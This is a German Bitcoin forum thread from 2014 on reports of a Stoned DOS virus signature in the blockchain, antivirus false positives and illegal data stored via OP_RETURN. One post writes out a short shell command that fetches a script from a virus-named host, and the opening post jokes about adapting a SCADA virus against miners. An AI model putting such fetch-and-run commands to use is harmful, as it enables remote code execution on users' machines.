Ov3R (OP)
|
|
May 18, 2014, 09:38:38 AM |
|
Mir ist aufgefallen das Bitcoinwisedom laggt, kurz darauf les ich folgende news .. http://www.golem.de/news/stoned-uralter-dos-virus-in-der-bitcoin-blockchain-1405-106544.htmlBin kein Crack was das angeht aber laut Kommentaren dort (ich gehe von aus das sind auch keine btc profis) wäre es möglich inhalte in der Blockchain unterzubringen die in Deutschland oder anderen ländern innhaltlich verboten wären was wiederum ein bann zu folge hätte. Ist sowas tatsächlich möglich ? oder nur wieder irgendeine Fud Man kann halt mit den Transfer-Kommentaren informationen legaler / Illegaler Natur mit dem Transfer in den Blockchain dauerhaft legen . Ich denke , dass dieses Ablegen der Virus signatur ein Angriff auf die BTC Stabilität sein sollte , denn ein mit Virenscanner bestückter Rechner wird die BlockChain löschen / Sperren und in einer unendlichen Blockchain ladeschleife als BTC Wallet unbrauchbar werden. Ohne Virenscanner ist er dann auch angreifbar . Finden wir demnächst sämtliche Virensignaturen in der Blockchain wieder? Keine schöne Vorstellung intressant ist , warum die Miner nicht es schon beim berechnen festgestellt haben. Scheinen wohl Virenscanner frei zu laufen . Gut zu wissen , man sollte den SCADA Virus mal anpassen , so dass er Miner angreift und allen meinen Kontostand mitteilt ( Wie war noch mal die maximale übrige BTC Menge ) Vermutlich einfach deshalb, weil ein großteil der Miner Headless-Linux Maschinen sind.
|
(B)asic (i)nstructions (T)o [C]ontrol [O]wn [in]terests
|
|
|
jumpman72
Newbie
Offline
Activity: 46
Merit: 0
|
|
May 18, 2014, 09:50:17 AM |
|
Wenn das BTC-Protokoll gut programmiert ist sollte es keine Probleme geben. Denn die Groesse der Nachrichten in der Blockchain sind begrenzt. D.h. du kannst dort nicht beliebig grosse Viren/Trojaner unterbringen. Eine Loesung waere, dass keine binaeren Daten in der Blockchain abgelegt werden duerfen. So eine Aenderung sollte relativ einfach am Protokoll vorgenommen werden koennen. D.h. ausfuehrbarer Code und Bilder/Videos/mp3s/zips waeren dann schon mal keine Gefahr mehr. Klar kann man die auch in Hex-Darstellung unterbringen, dann schwillt der "Code" aber unverhaeltnismaessig an und die Menge der unterbringbaren Daten verringert sicht weiter. ob das wirklich nicht in den Blockchain passt Momentan hängt es nur an der automatischen Ausführung durch den Miner
|
|
|
|
dewdeded
Legendary
Offline
Activity: 1232
Merit: 1011
Monero Evangelist
|
|
May 18, 2014, 11:01:04 AM |
|
OP_RETURN ist nur 40 Bytes.
|
|
|
|
jumpman72
Newbie
Offline
Activity: 46
Merit: 0
|
|
May 18, 2014, 11:34:17 AM |
|
OP_RETURN ist nur 40 Bytes.
"bash -c ftp:\\linuxvirus.ru\bitcoin.sh" 38 Bytes wird zwar immer noch nicht ausgeführt , aber befehl ist kurz genug
|
|
|
|
curiosity81
Legendary
Offline
Activity: 1778
Merit: 1070
|
|
May 18, 2014, 12:38:20 PM |
|
OP_RETURN ist nur 40 Bytes.
"bash -c ftp:\\linuxvirus.ru\bitcoin.sh" 38 Bytes wird zwar immer noch nicht ausgeführt , aber befehl ist kurz genug . Sowas laeuft aber imho nicht unter der Definition Virus und ist deshalb nicht verbotswuerdig. Wobei, wenn man bedenkt, dass sogar die Verlinkung von rechtlich geschuetzten Daten rechtlich fragwuerdig sein kann, dann kann das noch zu Problemen fuehren: http://www.e-recht24.de/artikel/haftunginhalte/22.html
|
|
|
|
|
OhShei8e
Legendary
Offline
Activity: 1792
Merit: 1059
|
|
May 18, 2014, 09:15:18 PM |
|
|
|
|
|
Ricke
|
|
May 18, 2014, 09:44:41 PM |
|
Das Problem "Virensignatur in Blockchain" ist schon länger bekannt: http://www.reddit.com/r/Bitcoin/comments/22a1te/alert_windows_defender_detects_dakuma1935_virus/Ich betreibe den Original-Client schon länger und hatte schon vor über 1 Monat Probleme mit Virenwächtern gehabt, die meine Blockchain als verseucht erkannten und in Quarantäne verschieben wollten. Gottseidank war ich aufmerksam genug und hab die betroffenen Dateien wiederhergestellt anstatt sie zu löschen. Gegenmaßnahme: Schritt 1: Antiviren-Programm öffnen Schritt 2: Bitcoin-Blockchain-Verzeichnis in die Ausnahmeliste hinzufügen Fertig. Seitdem habe ich Ruhe.
|
Verkaufe Bitcoin gegen Bargeld (Wuppertal und Düsseldorf, Handel im öffenlichen Raum, z.B. bei McDonalds), privat zu privat und völlig anonym. Konditionen im Thread; Individualabsprachen möglich (Ich mache mit Erstkontakten nur kleinere Handel, weiteres ja nach Kurs, Vertrauen, mein Bedarf, Ermessen und Situation)
|
|
|
WiiD
|
|
May 18, 2014, 09:49:00 PM |
|
Gegenmaßnahme: Schritt 1: Antiviren-Programm öffnen Schritt 2: Bitcoin-Blockchain-Verzeichnis in die Ausnahmeliste hinzufügen Fertig.
Hör doch auf diese Negativ-Meldung zu negieren, wie du weißt, doppelte Verneinung ist starke Bejahung. Und das wollen die Leute die noch einen Haufen Bitcoins für ~450$ pro Stück kaufen wollen ganz sicher nicht, die können garnicht genug Negativ-Meldungen haben.
|
|
|
|
mezzomix
Legendary
Offline
Activity: 2702
Merit: 1261
|
|
May 19, 2014, 06:09:16 AM |
|
Allerdings sehe ich das Problem in diesem Fall eher beim "Virenscanner" (der in diesem Fall genau so wenig auf Viren scannt, wie der Zitronenfalter Zitronen faltet).
|
|
|
|
dewdeded
Legendary
Offline
Activity: 1232
Merit: 1011
Monero Evangelist
|
|
May 19, 2014, 09:34:11 AM |
|
Signaturen von Viren zu suchen ist echtes und "richtiges" Virenscanning.
|
|
|
|
segeln
|
|
May 19, 2014, 01:42:21 PM |
|
(der in diesem Fall genau so wenig auf Viren scannt, wie der Zitronenfalter Zitronen faltet).
der war gut +1
|
|
|
|
hartvercoint
|
|
May 19, 2014, 04:52:03 PM |
|
Allerdings sehe ich das Problem in diesem Fall eher beim "Virenscanner" (der in diesem Fall genau so wenig auf Viren scannt, wie der Zitronenfalter Zitronen faltet).
Schickst du denn den grünen Pelz auf deinem Brot auch erst ins Labor, bevor du sagen würdest, dass es Schimmel ist? "grün und pelzig" oder "weiß und pelzig" reicht da als Schimmelsignatur einfach aus! Pelziges Brot ist generell verdächtig! Genauso ist es mit grünem Pelz auf der Blockchain!
|
|
|
|
Freyr
|
|
May 19, 2014, 07:43:22 PM |
|
Hat eigentlich jemand mal eine detailliertere Quelle dazu oder es selbst erlebt? Mich würde interessieren, in welcher Datei der Virus sein soll. Vor paar Monaten gab es ja einen ähnlichen Fall, aber da soll der Virus in den sst-Dateien gewesen sein. Das sind Indexdateien (Sorted String Table), die von der Datenbankschicht erzeugt werden, also nicht aus der Blockchain stammen. Die Virussignatur ist da also rein zufällig entstanden. Quelle: https://bitcointalk.org/index.php?topic=557370.0
|
|
|
|
OhShei8e
Legendary
Offline
Activity: 1792
Merit: 1059
|
|
May 19, 2014, 09:14:20 PM |
|
Hat eigentlich jemand mal eine detailliertere Quelle dazu oder es selbst erlebt? Mich würde interessieren, in welcher Datei der Virus sein soll. Vor paar Monaten gab es ja einen ähnlichen Fall, aber da soll der Virus in den sst-Dateien gewesen sein. Das sind Indexdateien (Sorted String Table), die von der Datenbankschicht erzeugt werden, also nicht aus der Blockchain stammen. Die Virussignatur ist da also rein zufällig entstanden. Quelle: https://bitcointalk.org/index.php?topic=557370.0 Valider Punkt. Der Block wird in keinem Artikel, den ich gelesen habe, genannt. Selbst wenn es stimmt, so richtig überprüft scheint das keiner zu haben. Ausgangspunkt scheint diese Diskussion gewesen zu sein: https://answers.microsoft.com/en-us/protect/forum/mse-protect_updating/microsoft-security-essentials-reporting-false/0240ed8e-5a27-4843-a939-0279c8110e1cDa wird aber nichts Konkretes genannt, außer, dass der AV-Scanner aufheult. Am Ende schreiben wohl nur alle voneinander ab. Fazit: Was man nicht selbst gesehen hat, nicht glauben.
|
|
|
|
dewdeded
Legendary
Offline
Activity: 1232
Merit: 1011
Monero Evangelist
|
|
May 19, 2014, 09:22:39 PM |
|
Durchsucht ("grep"'t) doch einfach mal das/die Blockchain(-Verzeichnis) nach dem String "toned". Dann solltet ihr den Virus in der Chain finden. Ich bin mir sicher, dass die Virenscanner keine gehashte Signatur (des "Schadcodes") detecten sondern eben einfach den String den der Virus bei Start des Computers meldet. Da dieser "Your [PC|Computer] has been [s|S]toned[.|!]" lauten kann, würde ich eben nach "toned" suchen.
|
|
|
|
mezzomix
Legendary
Offline
Activity: 2702
Merit: 1261
|
|
May 20, 2014, 06:05:17 AM |
|
Schickst du denn den grünen Pelz auf deinem Brot auch erst ins Labor, bevor du sagen würdest, dass es Schimmel ist? "grün und pelzig" oder "weiß und pelzig" reicht da als Schimmelsignatur einfach aus! Pelziges Brot ist generell verdächtig! Genauso ist es mit grünem Pelz auf der Blockchain! Ein DOS(!) Virus im (nicht ausführbaren) Block Storage ist eben nicht verdächtig. Wobei der Scanner ja nicht mal ein Virus gefunden hat, sondern lediglich ein paar Byte die er für einen Teil des Virus gehalten hat. Wenn man die "Virensignatur" nur kurz genug macht, kann man in der Datenmenge der Blockchain vermutlich eine ganze Menge "böse Viren" finden. Ich lösche auch nicht alle meine Datenträger, wenn der Rechner mal ein unerwartetes Verhalten zeigt. Vorsicht ist angebracht, unkontrollierter panischer Aktionismus nicht.
|
|
|
|
hartvercoint
|
|
May 21, 2014, 09:22:30 AM |
|
Ein DOS(!) Virus im (nicht ausführbaren) Block Storage ist eben nicht verdächtig. Wobei der Scanner ja nicht mal ein Virus gefunden hat, sondern lediglich ein paar Byte die er für einen Teil des Virus gehalten hat. Wenn man die "Virensignatur" nur kurz genug macht, kann man in der Datenmenge der Blockchain vermutlich eine ganze Menge "böse Viren" finden.
Ich lösche auch nicht alle meine Datenträger, wenn der Rechner mal ein unerwartetes Verhalten zeigt. Vorsicht ist angebracht, unkontrollierter panischer Aktionismus nicht.
Das ist falsch. Die Tatsache, dass ich nicht einfach nen Doppelklick auf eine Datei machen kann, um sie auszuführen, heißt noch lange nicht, dass ihr Inhalt nicht ausführbar ist! Nur weil Code in der vorliegenden Form nicht auf triviale Weise ausgeführt werden kann, heißt das lange nicht, dass es unkritisch ist, dass er dort ist. Dass man ungehindert beliebige Binärdaten auf Bitcoin-Nodes hochladen kann, ist durchaus für ein Problem. Erst recht, wenn es dazu führt, dass viele Leute die entsprechenden Dateien im Virenscanner als Ausnahme hinzufügen müssen! Es wird immer nur nach Signaturen gesucht, anders ist es nicht praktikabel. Nach kompletten Viren zu suchen, würde auch bedeuten, dass ich mir mit dem Virenscanner zusammen eine riesige Datenbank an ausführbarer Schadsoftware herunterlade. Na vielen Dank!
|
|
|
|
mezzomix
Legendary
Offline
Activity: 2702
Merit: 1261
|
|
May 21, 2014, 10:53:24 AM |
|
Dass man ungehindert beliebige Binärdaten auf Bitcoin-Nodes hochladen kann, ist durchaus für ein Problem.
Das ist tatsächlich unschön, Erst recht, wenn es dazu führt, dass viele Leute die entsprechenden Dateien im Virenscanner als Ausnahme hinzufügen müssen!
aber hier ist eindeutig der "Virenscanner" schuld. Wenn er zu doof ist, tatsächliche Viren zu finden, und nur Fragmente entdeckt, sollte er wenigstens eine ordentliche Reaktion zeigen und nicht behaupten er habe einen Schädling gefunden oder sogar die Dateien entfernen/verschieben. Ja, IT Sicherheit ist unbequem. Es wird immer nur nach Signaturen gesucht, anders ist es nicht praktikabel. Nach kompletten Viren zu suchen, würde auch bedeuten, dass ich mir mit dem Virenscanner zusammen eine riesige Datenbank an ausführbarer Schadsoftware herunterlade. Na vielen Dank!
Ein Schadcode ist nicht unabhängig von der Präsentation ausführbar. Zu einer Schadsoftware gehört mehr als ein paar Binärdaten in einer Datenbank (wir sind hier ja nicht bei Vernor Vinge im Roman ). Ausserdem ist "nicht praktikabel" kein Argument dafür, grobe Fehler in der "Sicherheitssoftware" kritiklos hinzunehmen. Es gibt sehr wohl einfache Möglichkeiten, zu bewerten ob ein Schädlingsfragment tatsächlich Probleme macht. Auch eine abgestufte Reaktion ist kein Hexenwerk.
|
|
|
|
btcash
|
|
May 22, 2014, 04:48:24 PM |
|
Gibt zu dem Thema ziemlich wenig Inforamtionen. Eigentlich nur den Microsoft Support Thread. Nicht mal eine richtige Diskussion im Main bereich. Aber ist egal, ob wahr oder falsch. Die Problematik mit illegalem Inhalt in der Blockchain bleibt. Ich "warte" ja noch auf den ersten KiPo Link in der Blockchain. Gibt es einen Plan um damit umzugehen? User von SPV Clienten wird das Problem nicht betreffen, aber Betreiber von Nodes schon. EDIT: Scheinbar gibt es Ideen, aber werden wohl nicht sehr aktiv verfolgt. Wie Gavin immer so schön sagt, wir kümmern uns darum, wenn es ein Problem wird. http://sourceforge.net/p/bitcoin/mailman/message/30705609/
|
|
|
|
|